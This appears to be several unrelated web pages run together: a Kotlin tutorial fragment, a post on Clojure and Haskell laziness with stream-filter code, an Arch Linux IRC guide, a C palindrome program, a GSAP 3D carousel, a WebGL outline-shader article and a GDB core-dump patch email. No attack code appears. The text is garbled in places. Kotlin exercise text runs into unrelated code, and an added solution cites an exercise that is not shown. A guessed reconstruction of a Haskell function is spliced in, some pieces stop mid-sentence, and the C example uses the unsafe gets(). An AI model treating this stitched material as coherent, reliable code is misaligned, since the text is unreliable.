  val primes = mutableListOf<Int>()
  // 3
  while (testFactor * testFactor <= remainingValue) {
    if (remainingValue % testFactor == 0) {
      primes.add(testFactor)
      remainingValue /= testFactor
    } else {
      testFactor += 1
    }
  }
  if (remainingValue > 1) {
    primes.add(remainingValue)
  }
  return primes
}

MyMath.primeFactors(81) // [3, 3, 3, 3]

Challenges
- Given the Circle class below:

import kotlin.math.PI

class Circle(var radius: Double = 0.0) {
  val area: Double
    get() {
      return PI * radius * radius
    }
}

val months = arrayOf(
  "January", "February", "March", "April", "May", "June",
  "July", "August", "September", "October", "November", "December"
)

class SimpleDate(var month: String, var day: Int = 0) {
  fun advance() {
    day += 1
  }
}

var date = SimpleDate(month = "December", day = 31)
date.advance()
date.month // December; should be January!
date.day // 32; should be 1!

Key points
- Methods are behaviors that extend the functionality of a class.
- A typical method is a function defined inside of a class or object.
- A method can access the value of an instance by using the keyword this.
- Companion object methods add behavior to a class instead of the instances of that class. To define a companion object method, you add a function in the class companion object block.
- You can augment an existing class definition and add methods to it using extension methods.

Where to go from here?
Methods and properties are the things that make up your classes, instances, and objects. Learning about them as you have these last two chapters is important since you'll use them all the time in Kotlin.
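For reference, here is one way the first mini-exercise above could be solved, turning monthsUntilWinterBreak() into a read-only property with a custom getter (a sketch, not the book's official solution; it assumes the months array defined earlier in the chapter):

class SimpleDate(var month: String) {
  // Callers now write date.monthsUntilWinterBreak, with no parentheses.
  val monthsUntilWinterBreak: Int
    get() = months.indexOf("December") - months.indexOf(month)
}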
https://www.raywenderlich.com/books/kotlin-apprentice/v2.0/chapters/14-methods
CC-MAIN-2022-40
en
refinedweb
Laziness: Clojure vs Haskell

Last week I punted on randomness, and just made my genetic_search function take a [Double]. While that was convenient, it is unfortunately not as general as I thought at the time. I'm still in the process of learning Haskell, and I got confused between laziness in Clojure and laziness in Haskell. So how do they differ? The one-word answer is "purity", but let me try to expand on that a little bit.

Clojure has the "seq" abstraction, which is defined by the two functions first and next, where first gives you an element and next gives you another seq if there are more elements to be had, or nil if there are none. When I think of a lazy list, I think in terms of Clojure seqs, even though Clojure lists are actually not lazy. How is that different from Haskell? In Clojure, a lazy seq is one where the elements are explicitly produced on demand, and then cached. This sounds a lot like laziness in Haskell, except for one crucial difference: Clojure does not mind how these elements are produced, and in particular, whether that involves any kind of side effects. In Haskell, on the other hand, laziness means that the elements of a list will be computed on demand, but that only applies to pure computation. There is no lazy side effect in Haskell.

Here is a short Clojure program to illustrate this notion further. This program will ask the user for positive integers and then print a running total. First, we start with a seemingly pure function which, given a possibly lazy seq of numbers, returns its sum so far:

(defn sum-so-far [ls]
  (reductions + 0 ls))

Testing this out yields the expected behaviour:

t.core=> (sum-so-far [1 2 3 4 5])
(0 1 3 6 10 15)
t.core=>

The range function, with no argument, returns an infinite lazy seq of integers, starting with 0. We can use our sum-so-far function on it:

t.core=> (take 10 (sum-so-far (range)))
(0 0 1 3 6 10 15 21 28 36)
t.core=>

We can also construct a lazy seq by asking the user for input:

(defn read-nums []
  (print "Please enter a number: ")
  (flush)
  (cons (Integer/parseInt (read-line))
        (lazy-seq (read-nums))))

Testing it works as expected:

t.core=> (take 5 (read-nums))
Please enter a number: 1
Please enter a number: 2
Please enter a number: 3
Please enter a number: 4
Please enter a number: 5
(1 2 3 4 5)
t.core=>

Similarly, we can easily compute the running sum:

t.core=> (take 5 (sum-so-far (read-nums)))
Please enter a number: 1
Please enter a number: 2
Please enter a number: 3
Please enter a number: 4
(0 1 3 6 10)
t.core=>

So we have this one function, sum-so-far, that can handle any Clojure seq, regardless of how it is processed, and produces a new seq itself. Such a function is better thought of as a filter acting on a stream than as a function taking an argument and returning a result.

Let's look at the Haskell equivalent. The sum_so_far function seems easy enough:

sum_so_far :: [Int] -> [Int]
sum_so_far is = loop 0 is
  where loop :: Int -> [Int] -> [Int]
        loop sum [] = [sum]
        loop sum (h:t) = sum : loop (sum + h) t

I don't know if Haskell has a direct equivalent to Clojure's reductions, but that's not the point here and it's easy enough to code our own. This obviously works as intended on both finite and infinite lists:

*Main> sum_so_far [1, 2, 3, 4, 5]
[0,1,3,6,10,15]
*Main> let ints = 1:map (+1) ints
*Main> take 10 $ sum_so_far ints
[0,1,3,6,10,15,21,28,36,45]
*Main>

But what about read-nums? It's not too hard to replicate the beginning of the function:

read_nums :: IO [Int]
read_nums = do
  int <- read <$> getLine
  return int : ???
How can we replace those ???? Well, the : ("cons") function needs a list as its second argument, so we could try constructing that:

read_nums :: IO [Int]
read_nums = do
  int <- read <$> getLine
  tl <- read_nums
  return $ int : tl

That typechecks. But the whole point of monads is to sequence computation: there is no way we can reach the return line without having first produced the entire tl, and thus we're not lazy anymore and can't pile on more processing on top of this. What other option do we have? Perhaps Hoogle knows of a function that would help here? The type we'd need would look something like:

Int -> IO [Int] -> IO [Int]

so we could replace : and use that instead. Hoogle does find a result for that, but it's not quite what we need here. We could of course write a function with that signature easily enough:

ignore_tl :: Int -> IO [Int] -> IO [Int]
ignore_tl i _ = pure [i]

but that's obviously not what we want. Are we stuck? Let's take a step back. The solution here is to realize that Clojure seqs are not the same as Haskell lists. Instead of thinking of sum-so-far as a function, let's go back to the idea of thinking of it as a filter between two streams. What would it take to construct such a filter in Haskell? We'd need a type with the following operations:
- Produce an element in the "output" stream.
- Request an element from the "input" stream.
- Let my consumer know that I will not be producing further elements.

The decoupling Clojure gives us is to be completely independent of how the input elements are produced and to produce the output elements on-demand. Let's model this a bit more precisely. We need a data definition OnDemand that represents a filter between two streams of elements. The filter could change the type, so we'll make it take two type parameters: an input one and an output one. We start with:

data OnDemand input output

Next, we need to be able to express "here is an element" and "there are no more elements". We can take a page from the List book and express those exactly like Nil and Cons:

  = Halt
  | Out output (OnDemand input output)

Finally, we need to be able to ask for a new element, wait for it, and then keep going. This phrasing suggests we need to suspend the current computation to give our supplier the opportunity to manufacture an input, and keep going after that. A generally good way to model suspended computations is with a continuation:

  | In (Maybe input -> OnDemand input output)

where the input parameter is wrapped in a Maybe because the input stream may have run out.
First, let's define a simple function to produce a stream from a list:

out_list :: [a] -> OnDemand () a
out_list [] = Halt
out_list (h:t) = Out h (out_list t)

Then, let's define a function to drain a stream into a list:

drain :: OnDemand () b -> [b]
drain = \case
  Halt -> []
  Out b kont -> b : drain kont
  In f -> drain $ f Nothing

Now, we can do fun stuff like

*Main> drain $ out_list [1, 2, 3, 4]
[1,2,3,4]
*Main>

Ok, so maybe that's not so much fun yet. We'd like to be able to express the equivalent of take 10 $ sum_so_far $ ints. Let's first work on each of these pieces. We can get a stream of naturals with

ints :: OnDemand () Int
ints = loop 1
  where loop n = Out n (loop (n + 1))

and we can limit a stream to a given number of elements with:

take_od :: Int -> OnDemand a a
take_od 0 = Halt
take_od n = In (\case
  Nothing -> Halt
  Just a -> Out a (take_od $ n - 1))

We now have all the pieces. What's the equivalent of $? We need to take two filters and return a filter that combines them; call it join (its definition appears in the full listing at the end). Here is how it works. We start from the outer filter. If that one says to stop, we don't need to look into any more input from the inner filter. If we have an output ready, we can just produce that. So far, so good. What happens if the outer filter needs an input? Well, in that case, we need to look at the inner one. Does it have an output ready? If so, we can just feed that into the outer filter. Is it halted? We can feed that information into the outer filter by calling its continuation with Nothing. Finally, if the inner filter itself is also waiting for an input, we have no other choice but to ask for more input from the context. We can now have a bit more fun:

*Main> drain $ ints `join` sum_so_far `join` take_od 20
[0,1,3,6,10,15,21,28,36,45,55,66,78,91,105,120,136,153,171,190]
*Main>

This may look like the beginnings of a useful abstraction. But can we do IO with it? Let's try to write read_nums. We still cannot write an OnDemand () (IO Int) that would be useful, just like we could not write a useful IO [Int]. But the whole point of this OnDemand stuff is to do operations one at a time. So let's define a function that gets a single integer:

import qualified Text.Read
{- ... -}
read_num :: IO (Maybe Int)
read_num = Text.Read.readMaybe <$> getLine

We cannot create an infinite stream of lazy IO actions. We've already gone through that rabbit hole.
But what we can do is define a function that will run a filter within the IO context and generate all the required elements on demand:

process :: IO (Maybe a) -> OnDemand a b -> IO [b]
process io = \case
  Halt -> return []
  Out hd k -> do
    tl <- process io k
    return $ hd : tl
  In f -> do
    input <- io
    process io (f input)

Now we can use the exact same sum_so_far filter with values coming from pure and impure contexts:

*Main> drain $ ints `join` sum_so_far `join` take_od 10
[0,1,3,6,10,15,21,28,36,45]
*Main> process read_num $ sum_so_far `join` take_od 5
1
2
3
4
[0,1,3,6,10]
*Main>

Here is the full code for reference:

{-# LANGUAGE LambdaCase #-}

module Main where

import qualified Text.Read

data OnDemand a b
  = Halt
  | Out b (OnDemand a b)
  | In (Maybe a -> OnDemand a b)

sum_so_far :: OnDemand Int Int
sum_so_far = loop 0
  where loop :: Int -> OnDemand Int Int
        loop sum = Out sum (In $ \case
          Nothing -> Halt
          Just n -> loop (sum + n))

convert_list :: OnDemand input out -> [input] -> [out]
convert_list = \case
  Halt -> \_ -> []
  Out out cont -> \ls -> out : convert_list cont ls
  In f -> \case
    [] -> convert_list (f Nothing) []
    hd:tl -> convert_list (f $ Just hd) tl

out_list :: [a] -> OnDemand () a
out_list [] = Halt
out_list (h:t) = Out h (out_list t)

drain :: OnDemand () b -> [b]
drain = \case
  Halt -> []
  Out b kont -> b : drain kont
  In f -> drain $ f Nothing

ints :: OnDemand () Int
ints = loop 1
  where loop n = Out n (loop (n + 1))

take_od :: Int -> OnDemand a a
take_od 0 = Halt
take_od n = In (\case
  Nothing -> Halt
  Just a -> Out a (take_od $ n - 1))
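-- The original post defines a `join` combinator at this point in the
-- listing, but its body does not appear in the text above. The following
-- is a reconstruction based on the prose description of join earlier in
-- the post (an educated guess, not necessarily the author's exact code):
join :: OnDemand a b -> OnDemand b c -> OnDemand a c
join inner outer = case outer of
  Halt      -> Halt
  Out c k   -> Out c (join inner k)
  In f      -> case inner of
    Halt    -> join inner (f Nothing)
    Out b k -> join k (f (Just b))
    In g    -> In (\a -> join (g a) outer)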
-exec_random :: WithRandom a -> [Double] -> ([Double] -> a -> b) -> b -exec_random m s cont = case m of - Bind ma f -> exec_random ma s (\s a -> exec_random (f a) s cont) - Return a -> cont s a - GetRand -> cont (tail s) (head s) +exec_random :: WithRandom a -> (a -> OnDemand Double b) -> OnDemand Double b +exec_random m cont = case m of + Bind ma f -> exec_random ma (\a -> exec_random (f a) cont) + Return a -> cont a + GetRand -> In (\r -> cont r) The biggest change is the signature of the main genetic_search function: instead of getting a [Double] as the last input and returning a [(solution, Double)], we now just return a OnDemand Double (solution, Double). - -> [Double] - -> [(solution, Double)] -genetic_search fitness mutate crossover make_solution rnd = - map head $ exec_random init - rnd - (\rnd prev -> loop prev rnd) + -> OnDemand Double (solution, Double) +genetic_search fitness mutate crossover make_solution = + exec_random init (\prev -> Out (head prev) (loop prev)) where - loop :: [(solution, Double)] -> [Double] -> [[(solution, Double)]] - loop prev rnd = prev : exec_random (step prev) - rnd - (\rnd next -> loop next rnd) + loop :: [(solution, Double)] -> OnDemand Double (solution, Double) + loop prev = exec_random (step prev) (\next -> Out (head next) (loop next)) The changes here are mostly trivial: we just remove the manual threading of the random list, and add one explicit Out to the core loop. Finally, we of course need to change the call in the main function to actually drive the new version and provide random numbers on demand. This is a fairly trivial loop: - print $ map snd - $ take 40 - $ genetic_search fitness mutate crossover mk_sol rands + loop rands 40 $ genetic_search fitness mutate crossover mk_sol + where + loop :: [Double] -> Int -> OnDemand Double ((Double, Double), Double) -> IO () + loop rs n od = + if n == 0 + then return () + else case od of + Halt -> return () + In f -> do + next_rand <- pure (head rs) + loop (tail rs) n (f next_rand) + Out v k -> do + print v + loop rs (n - 1) k Obviously in an ideal scenario the next_rand <- pure (head rs) could be more complex; the point here is just to illustrate that we can do any IO we want to produce the next random element. The full, updated code can be found here (diff).
https://cuddly-octo-palm-tree.com/posts/2021-03-28-lazy-io/
CC-MAIN-2022-40
en
refinedweb
Arch IRC channels

To use Internet Relay Chat (IRC), you need an IRC client. The installation live environment includes the Irssi client. You are expected to familiarize yourself with our Code of conduct and General guidelines#IRC before joining any of the official channels. For a list of commonly used abbreviations, see Arch terminology and IRC Jargon.

Main channels

This section is about #archlinux, the main Arch Linux support IRC channel, and #archlinux-offtopic, the main Arch Linux social channel, both available on the Libera Chat network. See Libera Chat FAQ, as well as NickServ HELP when connected to irc.libera.chat:

/query NickServ HELP REGISTER
/query NickServ HELP IDENTIFY

- If /query happens to not work in your client, you can try using either /quote NickServ command or /msg NickServ command.
- Some IRC clients have a race condition where they try to autojoin channels before you have been identified with NickServ. You need to enable SASL to solve this. Either look up your IRC client's documentation or look at the Libera Chat SASL page to find instructions for how to enable it.
- You can get a list of people who can help you by typing /msg ChanServ FLAGS #archlinux, or join #libera and ask there.

Channel operators

Arch operators are ops in both #archlinux and #archlinux-offtopic. See the list below, or run /msg phrik listops on Libera Chat. If you for some reason need the help of an op, do not be shy to /query or /msg us. Here is the list of ops as of 2021-09-24:

- alad
- amcrae
- BrainDamage
- gehidore / man
- grawity
- heftig
- jelle
- MrElendig / Mion
- Namarrgon
- tigrmesh / tigr
- wonder / ioni

Libera Chat group contacts

Group contacts mediate matters between the Libera Chat network staff, Arch Linux staff and Arch Linux users. That includes the management of channels in the #archlinux-* namespace on the Libera Chat network and the assignment of archlinux/* hostmasks. Please note that only Arch Linux staff is eligible for hostmasks.

- wonder / ioni
- fukawi2
- anthraxx
- dvzrv
- Namarrgon

Collaborative debugging

When requesting help from an IRC help channel (like #archlinux), it is inappropriate to paste logs into the channel and this may even get you kicked. Use a pastebin instead; you can use phrik's factoid !paste to see which pastebins are acceptable.

Acceptable pastebins usually work without enabling JavaScript. Some require enabling JavaScript for posting from a web browser, which is still acceptable because it does not affect the viewer. They should not display advertising or other disrupting content and should also not require a login. Excellent pastebins usually provide a way to paste output via piping. An example list of acceptable pastebins:

- - supports pasting of almost any filetype. May have slightly broken MIME type detection.
- - supports pasting of images, but MIME type will be off.
- - good for people who want something graphical.
- - http-only. Popular, but it is useful when debugging an SSL issue, which means that https-only pastebins can not be used.

IRC usage

When first entering the channel, there is no need to say hello. State the problem you are experiencing and make sure to be verbose and to provide logfiles. It also helps to search for any error messages you are getting first, to not waste anybody's time. It is also worth it to search for issues on any of the bugtrackers of the relevant software. The more helpful and verbose you are, the quicker you are going to receive help.
If the problem or question is very specific to a particular piece of software, consider visiting the dedicated IRC channel for it if there is one. You are more likely to receive a good answer there.

Output errors/messages to a file

Sometimes it is not possible to pipe the output to a pastebin directly and it should be written into a file first.

$ application &> application-output.txt

This is useful when pasting logs that contain sensitive data, e.g. serial numbers in smartctl output, which have to be manually edited out.

Other channels

The size of our community led to the creation of multiple IRC channels. To get a list of all channels on irc.libera.chat that contain archlinux in their name, use the command /query alis LIST *archlinux*.

International IRC channels

International discussions are available at the following channels, also located on the irc.libera.chat IRC network, unless stated otherwise.
https://wiki.archlinux.org/title/IRC_channel
CC-MAIN-2022-40
en
refinedweb
#include <Configuration.h>

List of all members.

This class is present as the internal portion of a section's value hash table. It may store string, integer or binary data.

- Default constructor.
- String constructor, takes ownership of string. [explicit]
- Integer constructor.
- Binary constructor, takes ownership of data.
- Copy ctor.
- Destructor.
- Assignment operator.
- Points to the string value or binary data, or IS the integer.
- Length is only used when type_ == BINARY.
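The member briefs above describe a small tagged-union value holder. For orientation only, here is a sketch of the shape those briefs imply; apart from type_, the names are illustrative and this is not the actual ACE declaration from Configuration.h.

#include <cstddef>

// Sketch of the value type implied by the member list above.
class Value_IntId
{
public:
  enum Type { STRING, INTEGER, BINARY };

  Value_IntId ();                                   // Default constructor
  explicit Value_IntId (char *string);              // Takes ownership of string
  explicit Value_IntId (int value);                 // Integer constructor
  Value_IntId (void *data, std::size_t length);     // Takes ownership of data
  Value_IntId (const Value_IntId &rhs);             // Copy ctor
  ~Value_IntId ();                                  // Destructor
  Value_IntId &operator= (const Value_IntId &rhs);  // Assignment operator

private:
  Type type_;
  void *data_;          // points to the string value or binary data, or IS the integer
  std::size_t length_;  // only used when type_ == BINARY
};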
https://www.dre.vanderbilt.edu/Doxygen/5.4.4/html/ace/classACE__Configuration__Value__IntId.html
CC-MAIN-2022-40
en
refinedweb
Palindrome number by using while loop

A palindrome number is a number which remains the same when it is reversed. In C language, the user is allowed to enter any positive integer, and the program checks whether the given number is a palindrome or not by using a while loop.

Example 1

Following is the C program to find a palindrome number by using the while loop −

#include <stdio.h>

int main(){
   int num, temp, rem, rev = 0;
   printf("enter a number:\n");
   scanf("%d", &num);
   temp = num;
   while ( temp > 0){
      rem = temp %10;
      rev = rev *10+ rem;
      temp = temp /10;
   }
   printf("reversed number is = %d\n", rev);
   if ( num == rev )
      printf("\n%d is Palindrome Number.\n", num);
   else
      printf("%d is not the Palindrome Number.\n", num);
   return 0;
}

Output

When the above program is executed, it produces the following result −

enter a number:
1234
reversed number is = 4321
1234 is not the Palindrome Number.

enter a number:
1221
reversed number is = 1221
1221 is Palindrome Number.

Example 2

Consider another example of a C program that checks whether a string is a palindrome by using the while loop.

#include <stdio.h>
#include <string.h>

void pal(char string[]);

int main(){
   char string[100];
   printf("enter a string: ");
   gets(string);
   pal(string);
   return 0;
}

void pal(char string[]){
   int i = 0;
   int length = strlen(string) - 1;
   while (length > i){
      if(string[i++] != string[length--]){
         printf("\n %s is not a palindrome", string);
         return;
      }
   }
   printf("\n %s is a palindrome string", string);
}

Output

When the above program is executed, it produces the following result −

enter a string: tutorial
tutorial is not a palindrome

enter a string: saas
saas is a palindrome string
https://www.tutorialspoint.com/c-program-to-find-palindrome-number-by-using-while-loop
CC-MAIN-2022-40
en
refinedweb
="stage"> <div class="container"> <div class="ring"> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> </div> </div> </div> html, body, .stage, .ring, .img { width:100%; height: 100%; transform-style: preserve-3d; user-select:none; } html, body, .stage { overflow:hidden; background:#000; } div, svg { position: absolute; } .container { perspective: 2000px; width: 300px; height: 400px; left:50%; top:50%; transform:translate(-50%,-50%); } let xPos = 0; gsap.timeline() .set('.ring', { rotationY:180, cursor:'grab' }) //set initial rotationY so the parallax jump happens off screen .set('.img', { // apply transform rotations to each image rotateY: (i)=> i*-36, transformOrigin: '50% 50% 500px', z: -500, backgroundImage:(i)=>'url('+(i+32)+'/600/400/)', backgroundPosition:(i)=>getBgPos(i), backfaceVisibility:'hidden' }) .from('.img', { duration:1.5, y:200, opacity:0, stagger:0.1, ease:'expo' }) .add(()=>{ $('.img').on('mouseenter', (e)=>{ let current = e.currentTarget; gsap.to('.img', {opacity:(i,t)=>(t==current)? 1:0.5, ease:'power3'}) }) $('.img').on('mouseleave', (e)=>{ gsap.to('.img', {opacity:1, ease:'power2.inOut'}) }) }, '-=0.5') $(window).on('mousedown touchstart', dragStart); $(window).on('mouseup touchend', dragEnd); function dragStart(e){ if (e.touches) e.clientX = e.touches[0].clientX; xPos = Math.round(e.clientX); gsap.set('.ring', {cursor:'grabbing'}) $(window).on('mousemove touchmove', drag); } function drag(e){ if (e.touches) e.clientX = e.touches[0].clientX; gsap.to('.ring', { rotationY: '-=' +( (Math.round(e.clientX)-xPos)%360 ), onUpdate:()=>{ gsap.set('.img', { backgroundPosition:(i)=>getBgPos(i) }) } }); xPos = Math.round(e.clientX); } function dragEnd(e){ $(window).off('mousemove touchmove', drag); gsap.set('.ring', {cursor:'grab'}); } function getBgPos(i){ //returns the background-position string to create parallax movement in each image return ( 100-gsap.utils.wrap(0,360,gsap.getProperty('.ring', 'rotationY')-180-i*36)/360*500 )+'px 0px'; } Also see: Tab Triggers
https://codepen.io/creativeocean/pen/mdROBXx
CC-MAIN-2022-40
en
refinedweb
How to render outlines in WebGL This article describes how to visualize outlines for a WebGL scene as a post process, with example implementations for ThreeJS & PlayCanvas. There are a few common approaches that produce boundary-only outlines as shown on the left of the above picture. - Drawing objects twice, such that the backfaces make up the outline, described here. - A post process using the depth buffer, implemented in ThreeJS here. - Similar post process implemented in PlayCanvas here. Rendering the full outlines of a scene is particularly useful when you need to clearly see the geometry and structure of your scene. For example, the stylized aesthetic of Return of the Obra Dinn would be very hard to navigate without clear outlines. The technique I describe here is similar to the post process shaders linked above, with the addition of a “normal buffer” in the outline pass that is used to find those inner edges. Live Demo Below is a link to a live demo of this technique implemented in ThreeJS. You can drag and drop any glTF model (as a single .glb file) to see the outline effect on your own test models: You can also find the source code on GitHub:. Overview of the technique Our outline shader needs 3 inputs: - The depth buffer - The normal buffer - The color buffer (the original scene) Given these 3 inputs we will compute the difference between the current pixel’s depth value and its neighbors. A large depth difference tells us there’s a distance gap (this will typically give you the outer boundary of an object but not fine details on its surface). We will do the same with the normal buffer. A difference in normal direction means a sharp corner. This is what gives us the finer details. We then combine those differences to form the final outline, and combine that with the color buffer to add the outlines to the scene. Tip: The live demo has a scaling factor for each of the normal & depth. You can scale that to 0 to see the influence of each on the final set of outlines. Overview of the rendering pipeline Here is how we’re going to set up our effect: Render pass 1 captures the color of all objects in the scene in “Scene Buffer”. It also outputs the depth of every pixel in a separate “Depth Buffer”. Render pass 2 re-renders all objects in the scene with a normal material that colors it using the object’s view-normal at every pixel. This is written to the “Normal Buffer”. Finally, Outline pass is a post process, taking the 3 buffers and rendering onto a fullscreen quad. This can be further optimized by modifying the engine to combine the normal and depth buffers into one “NormalDepth”, similar to how Unity does it, to avoid the need for the 2nd render pass. A final step not shown in the diagram is an FXAA pass, which we need because we’re rendering the scene onto an off-screen buffer, which disables the browser’s native antialiasing. Implementation It’s difficult to describe this technique without reference to a specific engine since a core part of it is how to set up the rendering pipeline described above. The implementation details here will be specific to ThreeJS but you can see the PlayCanvas source code along with an editor project here: 1. Get the depth buffer 3D engines will typically draw all opaque objects into a depth buffer to ensure objects are rendered correctly without having to sort them back to front. All we have to do is get a reference to this buffer to pass it to our outline post process. 
In ThreeJS, this means setting depthBuffer = true on the render target we're creating so that we capture the "scene color" and the "depth buffer" at the same time. See: In our demo this is created here:

There are a few caveats to know when working with the depth buffer:

- You need to know how the values are "packed". Given the limited precision, does the engine just linearly interpolate Z values from camera.near to camera.far? Does it do this in reverse? Or use a logarithmic depth buffer?
- The engine most likely already has some mechanisms for working with depth values that you can re-use. For ThreeJS, you can include #include <packing> in your fragment shader, which will allow you to use these helper functions.
- For just visualizing it for debug purposes, you can collapse your camera's near/far to cover the bounds of the object so you can more clearly see the image.

2. Create a normal buffer

If your engine supports outputting the normals of everything in the scene, you should use that directly. Otherwise, you'll need to create a second render pass. This needs to be identical to the original render, with the only exception that all materials on all meshes are replaced by a "normal material" that renders the view space normals.

ThreeJS has a convenient scene.overrideMaterial property we can use for exactly this purpose. Instead of creating a new identical scene and a new identical camera, we can directly re-render the same scene with the given override material.

this.renderScene.overrideMaterial = new THREE.MeshNormalMaterial();
renderer.render(this.renderScene, this.renderCamera);
this.renderScene.overrideMaterial = null;

In our ThreeJS implementation this is encapsulated in CustomOutlinePass.js for convenience, but it is a completely separate render pass.

3. Create the outline post process

The outline effect is a post process: we've already rendered the scene, now we need to take those buffers, combine them, and render the result onto a fullscreen quad. The result of that will either go directly to the screen or to the next pass in the pipeline (like FXAA).

We need to pass 3 uniforms: sceneBuffer, depthBuffer, and normalBuffer. We create helper functions to read the depth at an offset from a given pixel. Then we sum up the difference between the current pixel's depth value and its neighbors.

float depth = getPixelDepth(0, 0);

// Difference between depth of neighboring pixels and current.
float depthDiff = 0.0;
depthDiff += abs(depth - getPixelDepth(1, 0));
depthDiff += abs(depth - getPixelDepth(-1, 0));
depthDiff += abs(depth - getPixelDepth(0, 1));
depthDiff += abs(depth - getPixelDepth(0, -1));

The same thing is done for normals as well. Since the normal is a 3-dimensional vector, we get the difference using the distance function.
vec3 normal = getPixelNormal(0, 0);

// Difference between normals of neighboring pixels and current
float normalDiff = 0.0;
normalDiff += distance(normal, getPixelNormal(1, 0));
normalDiff += distance(normal, getPixelNormal(-1, 0));
normalDiff += distance(normal, getPixelNormal(0, 1));
normalDiff += distance(normal, getPixelNormal(0, -1));

To render the outline only at this point we would do:

float outline = normalDiff + depthDiff;
gl_FragColor = vec4(vec3(outline), 1.0);

There are a few parameters here to tweak:

- We can include the diagonals in our neighbor sampling to get a more accurate outline.
- We can sample one or more neighbors further away, to get thicker outlines.
- We can multiply normalDiff and depthDiff by a scalar to control their influence on the final outline.
- We can tweak normalDiff and depthDiff so that only really stark differences in depth or normal direction show up as an outline. This is what the "normal bias" and the "depth bias" parameters control.

This is implemented in CustomOutlinePass.js.

4. Combine the outlines with your final scene

Finally, to combine the outline onto the scene, we mix the scene color with a chosen "outline color", based on our outline value.

float outline = normalDiff + depthDiff;
vec4 outlineColor = vec4(1.0, 1.0, 1.0, 1.0); // white outline
gl_FragColor = vec4(mix(sceneColor, outlineColor, outline));

This is also where you can create any custom logic for how you combine your outline with your scene. For example, in Return of the Obra Dinn, the outlines change color based on the lighting. To achieve this effect we would check the lighting direction against the surface normal in our normal buffer, and color the outline white if it is not in direct light, and black if it is facing the light source(s).

Thanks for reading! If you found this helpful, follow me on Twitter @Omar4ur to see more of my work. Thanks to Ronja Böhringer, whose Outlines via Postprocessing article helped me understand this technique and adapt it for the web.

If you have any suggestions or corrections to the code or technique, open an issue on GitHub () or reach out to me directly. You can find my contact info at:
https://omar-shehata.medium.com/how-to-render-outlines-in-webgl-8253c14724f9
CC-MAIN-2022-40
en
refinedweb
This is the mail archive of the gdb-patches@sourceware.org mailing list for the GDB project. This patch has a long story, but it all started back in 2015, with commit df8411da087dc05481926f4c4a82deabc5bc3859 ("Implement support for checking /proc/PID/coredump_filter"). The purpose of that commit was to bring GDB's corefile generation closer to what the Linux kernel does. However, back then, I did not implement the full support for the dumping of memory mappings containing ELF headers (like mappings of DSOs or executables). These mappings were being dumped most of time, though, because the default value of /proc/PID/coredump_filter is 0x33, which would cause anonymous private mappings (DSOs/executable code mappings have this type) to be dumped. Well, until something happened on binutils... A while ago, I noticed something strange was happening with one of our local testcases on Fedora GDB: it was failing due to some strange build-id problem. On Fedora GDB, we (unfortunately) carry a bunch of "local" patches, and some of these patches actually extend upstream's build-id support in order to generate more useful information for the user of a Fedora system (for example, when the user loads a corefile into GDB, we detect whether the executable that generated that corefile is present, and if it's not we issue a warning suggesting that it should be installed, while also providing the build-id of the executable). A while ago, Fedora GDB stopped printing those warnings. I wanted to investigate this right away, and spent some time trying to determine what was going on, but other things happened and I got sidetracked. Meanwhile, the bug started to be noticed by some of our users, and its priority started changing. Then, someone on IRC also mentioned the problem, and when I tried helping him, I noticed he wasn't running Fedora. Hm... So maybe the bug was *also* present upstream. After "some" time investigating, and with a lot of help from Keith and others, I was finally able to determine that yes, the bug is also present upstream, and that even though it started with a change in ld, it is indeed a GDB issue. So, as I said, the problem started with binutils, more specifically after the following commit was pushed: This commit makes ld use "-z separate-code" by default on x86-64 machines. What this means is that code pages and data pages are now separated in the binary, which is confusing GDB when it tries to decide what to dump. BTW, Fedora 28 binutils doesn't have this code, which means that Fedora 28 GDB doesn't have the problem. From Fedora 29 on, binutils was rebased and incorporated the commit above, which started causing Fedora GDB to fail. Anyway, the first thing I tried was to pass "-z max-page-size" and specify a bigger page size (I saw a patch that did this and was proposed to Linux, so I thought it might help). Obviously, this didn't work, because the real "problem" is that ld will always use separate pages for code and data. So I decided to look into how GDB dumped the pages, and that's where I found the real issue. What happens is that, because of "-z separate-code", the first two pages of the ELF binary are (from /proc/PID/smaps): Whereas before, we had only one: 00400000-00401000 r-xp 00000000 fc:01 798593 Notice how we have "Anonymous" data mapped into the page. This will be important. So, the way GDB decides which pages it should dump has been revamped by my patch in 2015, and now it takes the contents of /proc/PID/coredump_filter into account. 
The default value for Linux is 0x33, which means: Dump anonymous private, anonymous shared, ELF headers and HugeTLB private pages. Or: filter_flags filterflags = (COREFILTER_ANON_PRIVATE | COREFILTER_ANON_SHARED | COREFILTER_ELF_HEADERS | COREFILTER_HUGETLB_PRIVATE); Now, it is important to keep in mind that GDB doesn't always have *all* of the necessary information to exactly determine the type of a page, so the whole algorithm is based on heuristics (you can take a look at linux-tdep.c:dump_mapping_p and linux-tdep.c:linux_find_memory_regions_full for more info). Before the patch to make ld use "-z separate-code", the (single) page containing data and code was being flagged as an anonymous (due to the non-zero "Anonymous:" field) private (due to the "r-xp" permission), which means that it was being dumped into the corefile. That's why it was working fine. Now, as you can imagine, when "-z separate-code" is used, the *data* page (which is where the ELF notes are, including the build-id one) now doesn't have any "Anonymous:" mapping, so the heuristic is flagging it as file-backed private, which is *not* dumped by default. The next question I had to answer was: how come a corefile generated by the Linux kernel was correct? Well, the answer is that GDB, unlike Linux, doesn't actually implement the COREFILTER_ELF_HEADERS support. On Linux, even though the data page is also treated as a file-backed private mapping, it is also checked to see if there are any ELF headers in the page, and then, because we *do* have ELF headers there, it is dumped. So, after more time trying to think of ways to fix this, I was able to implement an algorithm that reads the first few bytes of the memory mapping being processed, and checks to see if the ELF magic code is present. This is basically what Linux does as well, except that, if it finds the ELF magic code, it just dumps one page to the corefile, whereas GDB will dump the whole mapping. But I don't think that's a big issue, to be honest. It's also important to explain that we *only* perform the ELF magic code check if: - The algorithm has decided *not* to dump the mapping so far, and; - The mapping is private, and; - The mapping's offset is zero, and; - The user has requested us to dump mappings with ELF headers. IOW, we're not going to blindly check every mapping. As for the testcase, I struggled even more trying to write it. Since our build-id support on upstream GDB is not very extensive, it's not really possible to determine whether a corefile contains build-id information or not just by using GDB. So, after thinking a lot about the problem, I decided to rely on an external tool, eu-unstrip, in order to verify whether the dump was successful. I verified the test here on my machine, and everything seems to work as expected (i.e., it fails without the patch, and works with the patch applied). We are working hard to upstream our "local" Fedora GDB patches, and we intend to submit our build-id extension patches "soon", so hopefully we'll be able to use GDB itself to perform this verification. I built and regtested this on the BuildBot, and no problems were found. I think it makes sense to include 